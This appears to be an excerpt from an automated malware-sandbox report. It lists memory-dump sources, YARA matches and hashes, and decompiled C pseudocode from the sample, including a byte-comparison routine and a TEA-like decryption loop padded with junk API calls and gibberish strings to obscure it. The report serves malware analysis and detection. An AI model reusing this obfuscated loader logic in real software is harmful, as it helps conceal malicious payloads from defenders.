                                                                                      0x0040e52e
                                                                                      0x0040e532
                                                                                      0x0040e534
                                                                                      0x0040e53a
                                                                                      0x0040e53d
                                                                                      0x0040e541
                                                                                      0x0040e541
                                                                                      0x00000000
                                                                                      0x0040e534
                                                                                      0x0040e519
                                                                                      0x0040e51c
                                                                                      0x0040e520
                                                                                      0x0040e524
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e524
                                                                                      0x0040e4f8
                                                                                      0x0040e4fb
                                                                                      0x0040e4ff
                                                                                      0x0040e503
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e503
                                                                                      0x0040e4d7
                                                                                      0x0040e4da
                                                                                      0x0040e4de
                                                                                      0x0040e4e2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e4e2
                                                                                      0x0040e0e5
                                                                                      0x0040e0e5
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                      • Instruction ID: 0843b29f35714b48bc86719b859723769e1f0d5a59cc2da2080ade0b7aa39ad3
                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                      • Instruction Fuzzy Hash: E8C16B73C0A9B30AC736852E446812BEA626FD175431ECBF29CD43F3C9967B5C2195D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040E0EC(void* __eax, void* __ecx) {
                                                                                      				void* _t177;
                                                                                      				signed int _t178;
                                                                                      				void* _t181;
                                                                                      				signed char _t187;
                                                                                      				signed char _t188;
                                                                                      				signed char _t189;
                                                                                      				signed char _t191;
                                                                                      				signed char _t192;
                                                                                      				signed int _t198;
                                                                                      				signed int _t284;
                                                                                      				void* _t287;
                                                                                      				void* _t289;
                                                                                      				void* _t291;
                                                                                      				void* _t293;
                                                                                      				void* _t295;
                                                                                      				void* _t297;
                                                                                      				void* _t300;
                                                                                      				void* _t302;
                                                                                      				void* _t304;
                                                                                      				void* _t307;
                                                                                      				void* _t309;
                                                                                      				void* _t311;
                                                                                      				void* _t314;
                                                                                      				void* _t316;
                                                                                      				void* _t318;
                                                                                      				void* _t321;
                                                                                      				void* _t323;
                                                                                      				void* _t325;
                                                                                      
                                                                                      				_t181 = __ecx;
                                                                                      				_t177 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                      					_t284 = 0;
                                                                                      					L11:
                                                                                      					if(_t284 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					_t187 =  *(_t177 - 0x18);
                                                                                      					if(_t187 ==  *(_t181 - 0x18)) {
                                                                                      						_t284 = 0;
                                                                                      						L22:
                                                                                      						if(_t284 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						_t188 =  *(_t177 - 0x14);
                                                                                      						if(_t188 ==  *(_t181 - 0x14)) {
                                                                                      							_t284 = 0;
                                                                                      							L33:
                                                                                      							if(_t284 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							_t189 =  *(_t177 - 0x10);
                                                                                      							if(_t189 ==  *(_t181 - 0x10)) {
                                                                                      								_t284 = 0;
                                                                                      								L44:
                                                                                      								if(_t284 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                      									_t284 = 0;
                                                                                      									L55:
                                                                                      									if(_t284 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									_t191 =  *(_t177 - 8);
                                                                                      									if(_t191 ==  *(_t181 - 8)) {
                                                                                      										_t284 = 0;
                                                                                      										L66:
                                                                                      										if(_t284 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										_t192 =  *(_t177 - 4);
                                                                                      										if(_t192 ==  *(_t181 - 4)) {
                                                                                      											_t178 = 0;
                                                                                      											L78:
                                                                                      											if(_t178 == 0) {
                                                                                      												_t178 = 0;
                                                                                      											}
                                                                                      											L80:
                                                                                      											return _t178;
                                                                                      										}
                                                                                      										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                      										if(_t287 == 0) {
                                                                                      											L70:
                                                                                      											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                      											if(_t289 == 0) {
                                                                                      												L72:
                                                                                      												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                      												if(_t291 == 0) {
                                                                                      													L75:
                                                                                      													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                      													if(_t178 != 0) {
                                                                                      														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                                                                                      													}
                                                                                      													goto L78;
                                                                                      												}
                                                                                      												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                                                                                      												if(_t198 == 0) {
                                                                                      													goto L75;
                                                                                      												}
                                                                                      												L74:
                                                                                      												_t178 = _t198;
                                                                                      												goto L78;
                                                                                      											}
                                                                                      											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                                                                                      											if(_t198 != 0) {
                                                                                      												goto L74;
                                                                                      											}
                                                                                      											goto L72;
                                                                                      										}
                                                                                      										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                      										if(_t198 != 0) {
                                                                                      											goto L74;
                                                                                      										}
                                                                                      										goto L70;
                                                                                      									}
                                                                                      									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                      									if(_t293 == 0) {
                                                                                      										L59:
                                                                                      										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                      										if(_t295 == 0) {
                                                                                      											L61:
                                                                                      											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                      											if(_t297 == 0) {
                                                                                      												L63:
                                                                                      												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                      												if(_t284 != 0) {
                                                                                      													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                      												}
                                                                                      												goto L66;
                                                                                      											}
                                                                                      											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                                                                                      											if(_t284 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L63;
                                                                                      										}
                                                                                      										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                                                                                      										if(_t284 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L61;
                                                                                      									}
                                                                                      									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                                                                                      									if(_t284 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L59;
                                                                                      								}
                                                                                      								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                      								if(_t300 == 0) {
                                                                                      									L48:
                                                                                      									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                      									if(_t302 == 0) {
                                                                                      										L50:
                                                                                      										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                      										if(_t304 == 0) {
                                                                                      											L52:
                                                                                      											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                                                                                      											if(_t284 != 0) {
                                                                                      												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                      											}
                                                                                      											goto L55;
                                                                                      										}
                                                                                      										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                                                                                      										if(_t284 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L52;
                                                                                      									}
                                                                                      									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                                                                                      									if(_t284 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L50;
                                                                                      								}
                                                                                      								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                                                                                      								if(_t284 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                                                                                      							if(_t307 == 0) {
                                                                                      								L37:
                                                                                      								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                                                                                      								if(_t309 == 0) {
                                                                                      									L39:
                                                                                      									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                                                                                      									if(_t311 == 0) {
                                                                                      										L41:
                                                                                      										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                                                                                      										if(_t284 != 0) {
                                                                                      											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                      										}
                                                                                      										goto L44;
                                                                                      									}
                                                                                      									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                                                                                      									if(_t284 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L41;
                                                                                      								}
                                                                                      								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      								if(_t284 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L39;
                                                                                      							}
                                                                                      							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                                                                                      							if(_t284 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L37;
                                                                                      						}
                                                                                      						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                                                                                      						if(_t314 == 0) {
                                                                                      							L26:
                                                                                      							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                                                                                      							if(_t316 == 0) {
                                                                                      								L28:
                                                                                      								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                                                                                      								if(_t318 == 0) {
                                                                                      									L30:
                                                                                      									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                                                                                      									if(_t284 != 0) {
                                                                                      										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                      									}
                                                                                      									goto L33;
                                                                                      								}
                                                                                      								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                      								if(_t284 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      							if(_t284 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L28;
                                                                                      						}
                                                                                      						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                      						if(_t284 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                                                                                      					if(_t321 == 0) {
                                                                                      						L15:
                                                                                      						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                                                                                      						if(_t323 == 0) {
                                                                                      							L17:
                                                                                      							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                                                                                      							if(_t325 == 0) {
                                                                                      								L19:
                                                                                      								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                                                                                      								if(_t284 != 0) {
                                                                                      									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                                                                                      								}
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                      							if(_t284 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L19;
                                                                                      						}
                                                                                      						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                      						if(_t284 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                      					if(_t284 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L15;
                                                                                      				} else {
                                                                                      					__esi = __dl & 0x000000ff;
                                                                                      					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                      					if(__esi == 0) {
                                                                                      						L4:
                                                                                      						__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                      						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                      						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                      						if(__esi == 0) {
                                                                                      							L6:
                                                                                      							__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                      							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                      							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                      							if(__esi == 0) {
                                                                                      								L8:
                                                                                      								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                      								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                      								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                      								if(__esi != 0) {
                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                      								}
                                                                                      								goto L11;
                                                                                      							}
                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      							__esi = __edx;
                                                                                      							if(__edx != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L8;
                                                                                      						}
                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      						__esi = __edx;
                                                                                      						if(__edx != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      					__esi = __edx;
                                                                                      					if(__edx != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				L1:
                                                                                      				_t178 = _t284;
                                                                                      				goto L80;
                                                                                      			}
                                                                                      0x0040e0ec
                                                                                      0x0040e0ec
                                                                                      0x0040e0f2
                                                                                      0x0040e165
                                                                                      0x0040e167
                                                                                      0x0040e169
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e16f
                                                                                      0x0040e175
                                                                                      0x0040e1f4
                                                                                      0x0040e1f6
                                                                                      0x0040e1f8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e1fe
                                                                                      0x0040e204
                                                                                      0x0040e283
                                                                                      0x0040e285
                                                                                      0x0040e287
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e28d
                                                                                      0x0040e293
                                                                                      0x0040e312
                                                                                      0x0040e314
                                                                                      0x0040e316
                                                                                      0x00000000

Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction ID: 2c6faf662a173ce616d315292e1f84a282265d3ba05147685b3f7be9287a1502
• Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
• Instruction Fuzzy Hash: 62C14873C0A9B30AC735852E445822BEE626FD174431ECBF29CA03F3C9967B9D2195D4
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
• Instruction ID: 82d8cf0c4e26d031a3515707ac1bd8369c290c0fcb14aa358241c68696ccf550
• Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
• Instruction Fuzzy Hash: 19A1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
• Instruction ID: 01031f9733060372e49dc4c64eab98cf4f28593c37dfea0a5cce7aec6775dd8e
• Opcode Fuzzy Hash: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
• Instruction Fuzzy Hash: 8CB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
• Instruction ID: 1a3b0efa1f04712b53ba36bf8709049e69276b1a282cef974ef2cd3997d45686
• Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
• Instruction Fuzzy Hash: 1BC18CB5E002599FCB54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
• Instruction ID: f675d8c19ac0dab28620b3c6be011878332fb81c1eada811f5bc527cf674a699
• Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
• Instruction Fuzzy Hash: DAB16AB5E012599FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
Uniqueness

Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                      • Instruction ID: 3290a866668425eeec5a5df5501dd004489b7e3111da57d806264a214400602a
                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                      • Instruction Fuzzy Hash: 97113B7720008243EE44863DD4BC5B6DFA5FBC6321BAF427AD142CB75AD122D9419500
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                      • Instruction ID: bc18f0d63af314d3671e4580d57020916f12c29c48e9b935310c056f44c5da8b
                                                                                      • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                      • Instruction Fuzzy Hash: 9A113D0A8492C4BDCF424A7840E56EBEFA58E3B218F4A71DA88C44B743D01B150FE7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction ID: 795f648b5d90a5ec5479ba0ebaca9247a21416f8b5c153013536f91dae05d547
                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction Fuzzy Hash: DA1170723405049FD754DE65DC91FA773EAFB88320B298155EA08CB312D675EC01CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E004017B1(unsigned int* _a4) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				long _v44;
                                                                                      				short _v2092;
                                                                                      				char _v3116;
                                                                                      				short _v4140;
                                                                                      				short _v6188;
                                                                                      				unsigned int* _t51;
                                                                                      				intOrPtr _t52;
                                                                                      				intOrPtr _t53;
                                                                                      				intOrPtr _t56;
                                                                                      				intOrPtr _t57;
                                                                                      				intOrPtr _t61;
                                                                                      				signed int _t68;
                                                                                      				unsigned int* _t83;
                                                                                      				unsigned int _t111;
                                                                                      				unsigned int _t112;
                                                                                      
                                                                                      				E004136E0(0x1828);
                                                                                      				_t51 = _a4;
                                                                                      				_t112 =  *_t51;
                                                                                      				_t111 = _t51[1];
                                                                                      				if( *0x4b8384 == 0x904) {
                                                                                      					GetCommandLineA();
                                                                                      					SetEvent(0);
                                                                                      					HeapCreate(0, 0, 0);
                                                                                      				}
                                                                                      				_v16 = 0;
                                                                                      				if( *0x4b8384 == 0x114e) {
                                                                                      					VerLanguageNameW(0,  &_v4140, 0);
                                                                                      				}
                                                                                      				_t52 =  *0x4ae6e8; // 0xca91bdea
                                                                                      				_v40 = _t52;
                                                                                      				_t53 =  *0x4ae6ec; // 0xd9b1e084
                                                                                      				_v32 = _t53;
                                                                                      				E004017A7( &_v16);
                                                                                      				_v16 = _v16 + 0x22;
                                                                                      				if( *0x4b8384 == 0xb54) {
                                                                                      					__imp__CreateActCtxW(0);
                                                                                      					lstrcpyW( &_v2092, L"boxodexov rujavivokubecedubew lanokopipematonadofus pitoxabehobowerokinohogaxituk");
                                                                                      					EraseTape(0, 0, 0);
                                                                                      					__imp__FindNextVolumeA(0,  &_v3116, 0);
                                                                                      					__imp__FindFirstVolumeW( &_v6188, 0);
                                                                                      					__imp__FindNextVolumeA(0, 0, 0);
                                                                                      					LocalAlloc(0, 0);
                                                                                      				}
                                                                                      				_t56 =  *0x4ae6f0; // 0x6f476b76
                                                                                      				_v36 = _t56;
                                                                                      				_t57 =  *0x4ae6f4; // 0xd993b1c2
                                                                                      				_v28 = _t57;
                                                                                      				_v24 = 0x20;
                                                                                      				do {
                                                                                      					_v20 = 2;
                                                                                      					_v20 = _v20 + 3;
                                                                                      					E00401797(_t112,  &_v8);
                                                                                      					_v8 = _v8 + _v36;
                                                                                      					_t61 =  *0x4b8384;
                                                                                      					if(_t61 == 0xfa9) {
                                                                                      						 *0x4b6f94 = 0xedeb2e40;
                                                                                      					}
                                                                                      					if(_t61 == 0x3eb) {
                                                                                      						GetPrivateProfileSectionW(L"ruvalobibukuzefukeku",  &_v6188, 0, L"gewudubudihewujawejurorivujetit");
                                                                                      						InterlockedIncrement( &_v44);
                                                                                      						 *0x4b2f74 = 0;
                                                                                      					}
                                                                                      					 *0x4b6f90 = 0x9150ce2e;
                                                                                      					_v12 = _t112 >> _v20;
                                                                                      					E004017AE( &_v12, _v28);
                                                                                      					_t109 = _v16;
                                                                                      					_t68 = E004017A0(_v8, _v16 + _t112);
                                                                                      					_v8 = _t68;
                                                                                      					_t111 = _t111 - (_v12 ^ _t68);
                                                                                      					E00401797(_t111,  &_v8);
                                                                                      					_v12 = _t111 >> 5;
                                                                                      					E004017AE( &_v12, _v32);
                                                                                      					_v8 = E004017A0(_v8 + _v40, _t109 + _t111);
                                                                                      					E0040179D( &_v8, _v12);
                                                                                      					_t112 = _t112 - _v8;
                                                                                      					 *0x4b2f70 = 0;
                                                                                      					E00401790( &_v16);
                                                                                      					_t45 =  &_v24;
                                                                                      					 *_t45 = _v24 - 1;
                                                                                      				} while ( *_t45 != 0);
                                                                                      				_t83 = _a4;
                                                                                      				_t83[1] = _t111;
                                                                                      				 *_t83 = _t112;
                                                                                      				return _t83;
                                                                                      			}
                                                                                      APIs
                                                                                      • GetCommandLineA.KERNEL32 ref: 004017D7
                                                                                      • SetEvent.KERNEL32(00000000), ref: 004017DE
                                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004017E7
                                                                                      • VerLanguageNameW.KERNEL32(00000000,?,00000000), ref: 00401805
                                                                                      • CreateActCtxW.KERNEL32(00000000), ref: 00401833
                                                                                      • lstrcpyW.KERNEL32 ref: 00401845
                                                                                      • EraseTape.KERNEL32(00000000,00000000,00000000), ref: 0040184E
                                                                                      • FindNextVolumeA.KERNEL32(00000000,?,00000000), ref: 0040185D
                                                                                      • FindFirstVolumeW.KERNEL32(?,00000000), ref: 0040186B
                                                                                      • FindNextVolumeA.KERNEL32(00000000,00000000,00000000), ref: 00401874
                                                                                      • LocalAlloc.KERNEL32(00000000,00000000), ref: 0040187C
                                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 004018E3
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 004018ED
                                                                                      Strings
                                                                                      • gewudubudihewujawejurorivujetit, xrefs: 004018D1
                                                                                      • ", xrefs: 00401822
                                                                                      • boxodexov rujavivokubecedubew lanokopipematonadofus pitoxabehobowerokinohogaxituk, xrefs: 00401839
                                                                                      • ruvalobibukuzefukeku, xrefs: 004018DE
                                                                                      • , xrefs: 00401892
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FindVolume$CreateNext$AllocCommandEraseEventFirstHeapIncrementInterlockedLanguageLineLocalNamePrivateProfileSectionTapelstrcpy
